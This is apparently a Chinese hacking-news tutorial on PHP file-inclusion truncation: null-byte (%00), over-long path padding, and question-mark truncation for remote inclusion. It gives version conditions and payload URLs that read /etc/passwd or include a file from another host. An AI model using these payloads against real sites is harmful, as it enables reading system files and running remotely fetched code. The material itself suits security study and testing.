文件包含截断

文件包含截断

黑客资讯访客1970-01-01 8:00:002994A+A-

1、00截断法


00字符截断(php<5.3.4)

(需要 magic_quotes_gpc=off)

/etc/passwd
/etc/passwd%00

http://include.moonteam.com/file02.php?file=x.jpg%00

 

 

1.png

 

2、超长文件截断


(php版本小于5.2.8 可以成功,linux需要文件名长于4096,windows需要长于256)

利用操作系统对目录最大长度限制。

在window下256字节

linux下4096字节

截断的字符有

http://include.moonteam.com/file02.php?file=x.jpg..........................................................................................................................................................................................................................................



1559787665290550.jpg

http://include.moonteam.com/file02.php?file=x.jpg%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e


1559787775837097.jpg

3、问号截断


适用于远程截断。

php>=5.3
allow_url_fopen     On
allow_url_include   On

http://www.webtester.com/include/file02.php?file=http://192.168.0.121/x.txt?

3.png

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 4条评论
  • 拥嬉俗欲2022-06-02 11:19:02
  • %2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e
  • 夙世悸初2022-06-02 06:57:26
  • onteam.com/file02.php?file=x.jpg.....................................................
  • 余安渔阳2022-06-02 14:18:24
  • f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f
  • 蓝殇青尢2022-06-02 09:55:35
  • om/file02.php?file=x.jpg%00   2、超长文件截断(php版本小于5.2.8 可以成功,linux需要文件名长于4096,windows需要长于256)利用操作系统对目录最大长度

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理